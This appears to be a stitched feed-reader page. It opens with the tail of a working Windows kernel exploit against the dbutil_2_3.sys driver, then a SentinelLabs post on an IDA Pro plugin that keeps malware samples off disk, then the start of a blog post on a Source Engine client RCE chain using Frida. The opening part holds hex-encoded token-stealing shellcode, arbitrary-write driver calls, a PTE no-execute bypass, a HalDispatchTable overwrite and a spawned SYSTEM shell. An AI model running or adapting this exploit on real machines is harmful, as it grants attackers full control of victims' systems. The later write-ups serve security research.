            mov rax, [gs:0x188]     ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]   ; Current process (_EPROCESS)
            mov rbx, rax        ; Copy current process (_EPROCESS) to rbx
          __loop:
            mov rbx, [rbx + 0x2f0]    ; ActiveProcessLinks
            sub rbx, 0x2f0          ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x2e8]    ; UniqueProcessId (PID)
            cmp rcx, 4          ; Compare PID to SYSTEM PID
            jnz __loop            ; Loop until SYSTEM PID is found

            mov rcx, [rbx + 0x360]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x360], rcx    ; Copy SYSTEM token to current process

            xor rax, rax        ; set NTSTATUS STATUS_SUCCESS
            ret             ; Done!

        */

        // One QWORD arbitrary write
        // Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
        unsigned long long shellcode1 = 0x00018825048B4865;
        unsigned long long shellcode2 = 0x000000B8808B4800;
        unsigned long long shellcode3 = 0x02F09B8B48C38948;
        unsigned long long shellcode4 = 0x0002F0EB81480000;
        unsigned long long shellcode5 = 0x000002E88B8B4800;
        unsigned long long shellcode6 = 0x8B48E57504F98348;
        unsigned long long shellcode7 = 0xF0E180000003608B;
        unsigned long long shellcode8 = 0x4800000360888948;
        unsigned long long shellcode9 = 0x0000000000C3C031;

        // Buffers to send to the driver (write primitive)
        unsigned long long inBuf3[4];
        unsigned long long inBuf4[4];
        unsigned long long inBuf5[4];
        unsigned long long inBuf6[4];
        unsigned long long inBuf7[4];
        unsigned long long inBuf8[4];
        unsigned long long inBuf9[4];
        unsigned long long inBuf10[4];
        unsigned long long inBuf11[4];

        // Values to send
        unsigned long long one3 = 0x4141414141414141;
        unsigned long long two3 = shellcodeLocation;
        unsigned long long three3 = 0x0000000000000000;
        unsigned long long four3 = shellcode1;

        unsigned long long one4 = 0x4141414141414141;
        unsigned long long two4 = shellcodeLocation + 0x8;
        unsigned long long three4 = 0x0000000000000000;
        unsigned long long four4 = shellcode2;

        unsigned long long one5 = 0x4141414141414141;
        unsigned long long two5 = shellcodeLocation + 0x10;
        unsigned long long three5 = 0x0000000000000000;
        unsigned long long four5 = shellcode3;

        unsigned long long one6 = 0x4141414141414141;
        unsigned long long two6 = shellcodeLocation + 0x18;
        unsigned long long three6 = 0x0000000000000000;
        unsigned long long four6 = shellcode4;

        unsigned long long one7 = 0x4141414141414141;
        unsigned long long two7 = shellcodeLocation + 0x20;
        unsigned long long three7 = 0x0000000000000000;
        unsigned long long four7 = shellcode5;

        unsigned long long one8 = 0x4141414141414141;
        unsigned long long two8 = shellcodeLocation + 0x28;
        unsigned long long three8 = 0x0000000000000000;
        unsigned long long four8 = shellcode6;

        unsigned long long one9 = 0x4141414141414141;
        unsigned long long two9 = shellcodeLocation + 0x30;
        unsigned long long three9 = 0x0000000000000000;
        unsigned long long four9 = shellcode7;

        unsigned long long one10 = 0x4141414141414141;
        unsigned long long two10 = shellcodeLocation + 0x38;
        unsigned long long three10 = 0x0000000000000000;
        unsigned long long four10 = shellcode8;

        unsigned long long one11 = 0x4141414141414141;
        unsigned long long two11 = shellcodeLocation + 0x40;
        unsigned long long three11 = 0x0000000000000000;
        unsigned long long four11 = shellcode9;

        inBuf3[0] = one3;
        inBuf3[1] = two3;
        inBuf3[2] = three3;
        inBuf3[3] = four3;

        inBuf4[0] = one4;
        inBuf4[1] = two4;
        inBuf4[2] = three4;
        inBuf4[3] = four4;

        inBuf5[0] = one5;
        inBuf5[1] = two5;
        inBuf5[2] = three5;
        inBuf5[3] = four5;

        inBuf6[0] = one6;
        inBuf6[1] = two6;
        inBuf6[2] = three6;
        inBuf6[3] = four6;

        inBuf7[0] = one7;
        inBuf7[1] = two7;
        inBuf7[2] = three7;
        inBuf7[3] = four7;

        inBuf8[0] = one8;
        inBuf8[1] = two8;
        inBuf8[2] = three8;
        inBuf8[3] = four8;

        inBuf9[0] = one9;
        inBuf9[1] = two9;
        inBuf9[2] = three9;
        inBuf9[3] = four9;

        inBuf10[0] = one10;
        inBuf10[1] = two10;
        inBuf10[2] = three10;
        inBuf10[3] = four10;

        inBuf11[0] = one11;
        inBuf11[1] = two11;
        inBuf11[2] = three11;
        inBuf11[3] = four11;

        DWORD bytesReturned3 = 0;
        DWORD bytesReturned4 = 0;
        DWORD bytesReturned5 = 0;
        DWORD bytesReturned6 = 0;
        DWORD bytesReturned7 = 0;
        DWORD bytesReturned8 = 0;
        DWORD bytesReturned9 = 0;
        DWORD bytesReturned10 = 0;
        DWORD bytesReturned11 = 0;

        BOOL interact2 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf3,
          sizeof(inBuf3),
          &inBuf3,
          sizeof(inBuf3),
          &bytesReturned3,
          NULL
        );

        BOOL interact3 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf4,
          sizeof(inBuf4),
          &inBuf4,
          sizeof(inBuf4),
          &bytesReturned4,
          NULL
        );

        BOOL interact4 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf5,
          sizeof(inBuf5),
          &inBuf5,
          sizeof(inBuf5),
          &bytesReturned5,
          NULL
        );

        BOOL interact5 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf6,
          sizeof(inBuf6),
          &inBuf6,
          sizeof(inBuf6),
          &bytesReturned6,
          NULL
        );

        BOOL interact6 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf7,
          sizeof(inBuf7),
          &inBuf7,
          sizeof(inBuf7),
          &bytesReturned7,
          NULL
        );

        BOOL interact7 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf8,
          sizeof(inBuf8),
          &inBuf8,
          sizeof(inBuf8),
          &bytesReturned8,
          NULL
        );

        BOOL interact8 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf9,
          sizeof(inBuf9),
          &inBuf9,
          sizeof(inBuf9),
          &bytesReturned9,
          NULL
        );

        BOOL interact9 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf10,
          sizeof(inBuf10),
          &inBuf10,
          sizeof(inBuf10),
          &bytesReturned10,
          NULL
        );

        BOOL interact10 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf11,
          sizeof(inBuf11),
          &inBuf11,
          sizeof(inBuf11),
          &bytesReturned11,
          NULL
        );

        // A lot of error handling
        if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
        {
          printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          exit(-1);
        }
        else
        {
          printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

          // Clear the no-eXecute bit
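          // Bit 63 of a hardware PTE is the No-eXecute bit; zeroing the top nibble
          // clears it (along with the other high software bits), marking the page executable.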
          unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

          printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

          // Clear the no-eXecute bit in the actual PTE
          // Buffer to send to the driver (write primitive)
          unsigned long long inBuf13[4];

          // Values to send
          unsigned long long one13 = 0x4141414141414141;
          unsigned long long two13 = shellcodePte;
          unsigned long long three13 = 0x0000000000000000;
          unsigned long long four13 = taintedPte;

          // Assign the values
          inBuf13[0] = one13;
          inBuf13[1] = two13;
          inBuf13[2] = three13;
          inBuf13[3] = four13;


          // Interact with the driver
          DWORD bytesReturned13 = 0;

          BOOL interact12 = DeviceIoControl(
            driverHandle,
            IOCTL_WRITE_CODE,
            &inBuf13,
            sizeof(inBuf13),
            &inBuf13,
            sizeof(inBuf13),
            &bytesReturned13,
            NULL
          );

          // Error handling
          if (!interact12)
          {
            printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          }
          else
          {
            printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

            // Offset to nt!HalDispatchTable+0x8
            unsigned long long halDispatch = baseofKernel + 0x427258;

            // Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
            // Buffer to send to the driver (write primitive)
            unsigned long long inBuf14[4];

            // Values to send
            unsigned long long one14 = 0x4141414141414141;
            unsigned long long two14 = halDispatch;
            unsigned long long three14 = 0x0000000000000000;
            unsigned long long four14 = 0x0000000000000000;

            // Assign the values
            inBuf14[0] = one14;
            inBuf14[1] = two14;
            inBuf14[2] = three14;
            inBuf14[3] = four14;

            // Interact with the driver
            DWORD bytesReturned14 = 0;

            BOOL interact13 = DeviceIoControl(
              driverHandle,
              IOCTL_READ_CODE,
              &inBuf14,
              sizeof(inBuf14),
              &inBuf14,
              sizeof(inBuf14),
              &bytesReturned14,
              NULL
            );

            // Error handling
            if (!interact13)
            {
              printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
            }
            else
            {
              // Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
              unsigned long long preservedHal = inBuf14[3];

              printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

              // Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
              // Buffer to send to the driver (write primitive)
              unsigned long long inBuf15[4];

              // Values to send
              unsigned long long one15 = 0x4141414141414141;
              unsigned long long two15 = halDispatch;
              unsigned long long three15 = 0x0000000000000000;
              unsigned long long four15 = shellcodeLocation;

              // Assign the values
              inBuf15[0] = one15;
              inBuf15[1] = two15;
              inBuf15[2] = three15;
              inBuf15[3] = four15;

              // Interact with the driver
              DWORD bytesReturned15 = 0;

              BOOL interact14 = DeviceIoControl(
                driverHandle,
                IOCTL_WRITE_CODE,
                &inBuf15,
                sizeof(inBuf15),
                &inBuf15,
                sizeof(inBuf15),
                &bytesReturned15,
                NULL
              );

              // Error handling
              if (!interact14)
              {
                printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
              }
              else
              {
                printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

                // Locating nt!NtQueryIntervalProfile
                NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
                  GetModuleHandle(
                    TEXT("ntdll.dll")),
                  "NtQueryIntervalProfile"
                );

                // Error handling
                if (!NtQueryIntervalProfile)
                {
                  printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
                  exit(1);
                }
                else
                {
                  // Print update for found ntdll!NtQueryIntervalProfile
                  printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

                  // Calling nt!NtQueryIntervalProfile
                  ULONG exploit = 0;

                  NtQueryIntervalProfile(
                    0x1234,
                    &exploit
                  );

                  // Restoring nt!HalDispatchTable+0x8
                  // Buffer to send to the driver (write primitive)
                  unsigned long long inBuf16[4];

                  // Values to send
                  unsigned long long one16 = 0x4141414141414141;
                  unsigned long long two16 = halDispatch;
                  unsigned long long three16 = 0x0000000000000000;
                  unsigned long long four16 = preservedHal;

                  // Assign the values
                  inBuf16[0] = one16;
                  inBuf16[1] = two16;
                  inBuf16[2] = three16;
                  inBuf16[3] = four16;

                  // Interact with the driver
                  DWORD bytesReturned16 = 0;

                  BOOL interact15 = DeviceIoControl(
                    driverHandle,
                    IOCTL_WRITE_CODE,
                    &inBuf16,
                    sizeof(inBuf16),
                    &inBuf16,
                    sizeof(inBuf16),
                    &bytesReturned16,
                    NULL
                  );

                  // Error handling
                  if (!interact15)
                  {
                    printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                  }
                  else
                  {
                    printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
                    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

                    // Spawning an NT AUTHORITY\SYSTEM shell
                    system("cmd.exe /c cmd.exe /K cd C:\\");
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

// Call exploitWork()
void main(void)
{
  exploitWork();
}
☑ ★ ✇ SentinelLabs

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

By: Roman Rusetsky

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. First, if the researcher is actively investigating a sample and the AV throws a static detection, it can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in red in the graph, making them easier to spot. A plugin runs after the IDA database is initialized, meaning a binary is already loaded into the database. A loader, on the other hand, is what loads a binary into the IDA database in the first place.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to further extend IDA Pro's loading capability and load files into it from a memory buffer, whatever the source.

MemoryLoader is the base memory loader, a DLL where the memory-loading capabilities live. Its main functionality is to take a buffer of bytes from memory and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to disk. The loader accepts zip-format files (.zip). After accepting a zip file, it will display the files inside the archive and allow you to choose the one you want to work with.

MemZipLoader will extract the chosen file from the input ZIP into a memory buffer and load it into IDA without writing it to disk; only the (possibly encrypted) zip file itself remains on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is offered as an option for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the downloaded file will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the memory loader DLLs in the IDA directory folder.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  4. Place the loaders in the loaders directory of IDA.
      1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

  1. Open IDA and choose a zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files inside the zip will be displayed:
  4. IDA will then use the loader code and load the chosen file as if it were a local file on the system.

UrlLoader:

  1. Open any file on your computer from a directory you have write privileges to.
  2. UrlLoader will be suggested as one of the loaders for the file.
  3. After you choose UrlLoader, you will be asked to enter a URL:
  4. The loader will fetch the network location you entered. IDA Pro will then use the loader code and load the binary as if it were a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
    3. accept_file – this function returns a boolean indicating whether the loader is relevant to the binary currently being loaded into IDA. For example, if you are loading a PE, build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

  1. The project can be compiled into two versions: an x64 build for IDA with 64-bit addresses, and an x64 build for IDA with 32-bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64-bit IDA with 64-bit addresses
    2. X32 | X64 – 64-bit IDA with 32-bit addresses

 

  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files (similar for X64 | X64 and X32 | X64):
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
    2. X32 | X64
      1. idasdk75\lib\x64_win_vc_32
      2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
Conclusion

When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without ever writing them to disk.

Using the Memory Loader plugin also saves you time when analyzing binaries. When working with malicious content in IDA Pro, a separate environment is often created for it, usually in a virtual machine. Copying the binary over and setting up that machine every time you want to open IDA is time-consuming. The Memory Loader plugin allows you to work from your own machine in a safer and more productive way.

Please note that an IDA Pro license is needed to use and develop extensions for IDA Pro.

The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

 

The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

☑ ★ ✇ Reversing Engineering for the Soul

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you know that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent writing SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still uses the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll in the current process, hooks it, and then works with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these types of bugs is to exploit some buffer overflow, build a ROP chain using the module xinput.dll, which has ASLR marked as disabled, and execute shellcode from that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find this on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address; in fact, xinput.dll relocates just fine and can sometimes be found at different addresses depending on whether another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, inherently defeating ASLR, since you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem too concerned by this, as it’s been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.
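If you want to check this behavior for yourself, a module's ASLR opt-in is just a bit in its PE header. Below is a minimal sketch (not part of the exploit) that inspects the DllCharacteristics of a module loaded in the current process; the module name passed in is a placeholder, since the exact xinput DLL name varies between games:

#include <stdio.h>
#include <Windows.h>

// Returns 1 if the module opted into ASLR (dynamic base), 0 if not, -1 if it isn't loaded.
int IsDynamicBase(const char *moduleName)
{
    HMODULE base = GetModuleHandleA(moduleName);
    if (!base)
    {
        printf("[-] %s is not loaded in this process.\n", moduleName);
        return -1;
    }

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)base;
    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE *)base + dos->e_lfanew);

    // IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE must be set for the loader to randomize the image base.
    return (nt->OptionalHeader.DllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0;
}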

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The value that is sent back is either the integer value of the CVar or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
